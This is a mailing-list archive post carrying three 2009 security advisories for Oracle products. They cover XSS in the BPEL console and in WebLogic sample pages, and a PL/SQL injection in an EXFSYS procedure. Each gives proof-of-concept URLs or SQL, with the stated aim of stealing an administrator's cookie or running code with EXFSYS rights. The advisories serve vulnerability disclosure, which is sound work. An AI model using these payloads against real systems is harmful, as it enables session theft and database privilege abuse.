Oracle CPU Jan 2009 Advisories.

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Advisories for Oracle CPU January 2009 vulnerabilities Attached.





Polyakov Alexandr
Information Security Analyst
______________________
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polyakov@xxxxxxx  
www.dsec.ru


-----------------------------------
This message and any attachment are confidential and may be privileged or otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure 
is strictly prohibited. If you have received this message in error, please notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding 
statements by e-mail unless otherwise agreed. 
-----------------------------------      
Digital Security Research Group [DSecRG] Advisory    #DSECRG-09-001



Application:			Oracle Application Server (SOA)
Versions Affected:		Oracle Application Server (SOA) version 10.1.3.1.0  
Vendor URL:			http://www.oracle.com
Bugs:				XSS
Exploits:			YES
Reported:			10.01.2008
Vendor response:		11.01.2008
Date of Public Advisory:        13.01.2009
CVE:                            CVE-2008-4014
Description:   		        XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP 
Author:			        Alexandr Polyakov
				Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru)


Description
***********

Linked XSS vulnerability found in  BPEL module of Oracle Application Server (Oracle SOA Suite).  



Details
*******


Linked XSS vulnerability found in  BPEL module. In page BPELConsole/default/activities.jsp   attacker can inject XSS by appending it to URL




Example
*******


http://[localhost]:8888/BPELConsole/default/activities.jsp?'><script>alert('DSEC_XSS')</script>=DSecRG



Attacker must send injected link to administrator and get adminiatrators cookie.


Code with injected XSS:

----------------------------------------------------------------

 </th>
                    <th id="activityLabel" class="ListHeader" align="left" nowrap>
                    <a href='activities.jsp?'><script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label' class=HeaderLink>
                        Activity Label
                    </a>
                    </th>

---------------------------------------------------------------------------


Fix Information
***************

Information was published in CPU January 2009.
All customers can download CPU petches following instructions from: 

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html 



Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html 




About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:	research [at] dsec [dot] ru
		http://www.dsecrg.ru 
		http://www.dsec.ru






Digital Security Research Group [DSecRG] Advisory	#DSECRG-09-002


Application:			Oracle BEA Weblogic 10 
Versions Affected:		Oracle BEA Weblogic 10  
Vendor URL:			http://oracle.com
Bugs:				Multiple XSS Vulnerabilities in samples
Exploits:			YES
Reported:			16.07.2008
Vendor response:		18.07.2008 
Last response:                  30.10.2008
Description:   			reviewService sample of WebLogic Server.	
Date of Public Advisory:	13.01.2009  
Authors:			Alexandr Polyakov
				Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)


Description
***********


Multiple XSS Vulnerabilities found in Oracle BEA Weblogic Server samples version 10.2 and latest.



Details
*******

Vulnerabilities found in reviewService sample of Weblogic Server.

1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter "name"


Example
*******
http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>


2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title"


Example
*******
http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>


3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script>

4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script>

5. Also there are a couple of XSS vulnerabilities in POST parameters in scripts:


http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp
http://testserver.com:7001/reviewService/ClientServlet
http://testserver.com:7001/reviewService/InterceptorClientServlet
http://testserver.com:7001/reviewService/createArtist_service.jsp
http://testserver.com:7001/reviewService/createArtist_session.jsp

Fix Information
***************

This is Security-In-Depth vulnerability, because was found in samples.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm) 
Vulnerability issues that result in significant modification of Oracle code or documentation in future releases,
but are not of such a critical nature that they are distributed in Critical Patch Updates.


http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html 


Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in Security-In-Depth program of CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html 


About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:	research [at] dsec [dot] ru
		http://www.dsecrg.ru 
		http://www.dsec.ru






Digital Security Research Group [DSecRG] Advisory	#DSECRG-09-003


Application:			Oracle database 11G 
Versions Affected:		Oracle 11.1.0.6 and 10.2.0.1  
Vendor URL:			http://oracle.com
Bugs:				PL/SQL Injections
Exploits:			YES
Reported:			17.11.2008
Vendor response:		18.11.2008
Last response:                  24.11.2008          			
Date of Public Advisory:	13.01.2009 
Authors:			Alexandr Polyakov
				Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)


Description
***********

Oracle Database 11G vulnerable to PL/SQL Injection.

Vulnerability found in Extended filter system (EXFSYS).



Details
*******

PL/SQL Injection found in procedure EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS (maybe other functions in this package)
Procedure EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS executes with rights of user  EXFSYS.

If Attacker have access  to EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS. he can do all things with EXFSYS user rights;
By default user EXFSYS have privelege  "CREATE LIBRARY"  and "CREATE ANY TRIGGER". So he teoretically can get access to OS.


it can only be exploited by an attacker who is either running as a privileged users, e.g. as EXFSYS
or SYS, or on a system where access to the EXFSYS routines has been granted to unprivileged users so this a
defense in depth issue.


EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS  has 4 parameters 

TAB_OWNER
TAB_NAME
EXP_COLUMN
ASET_NM

"ASET_NM" is vulnerable to SQL Injection




Example:
*******

exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS('EXFSYS','EXF$VERSION','EXFVER
SION','YYYYYYY'' and 1=EVILPROC()--')



Vulnerable Request in v$sql log file
***********************************


SELECT attribute, data_type from  ADM_EXPFIL_ATTRIBUTES where owner = 'EXFSYS' and 
attribute_set_name = 'YYYYYYY' and EVILPROC()=EVILPROC()--' and table_alias =  'NO'  and (data_type like 'VARCHAR(%)' or data_type like 'VARCHAR2(%)'  
or data_type = 'INT' or data_type = 'INTEGER' or  data_type = 'NUMBER' or data_type = 'DATE')


Fix Information
***************

This is Security-In-Depth vulnerability.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm)
Vulnerability issues that result in significant modification of Oracle code or documentation in future releases,
but are not of such a critical nature that they are distributed in Critical Patch Updates.


http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html 



Credits
*******

Oracle give a credits for Alexander Polyakov from Digital Security Company in Security-In-Depth program of CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html 




About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:	research [at] dsec [dot] ru
		http://www.dsecrg.ru 
		http://www.dsec.ru









[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux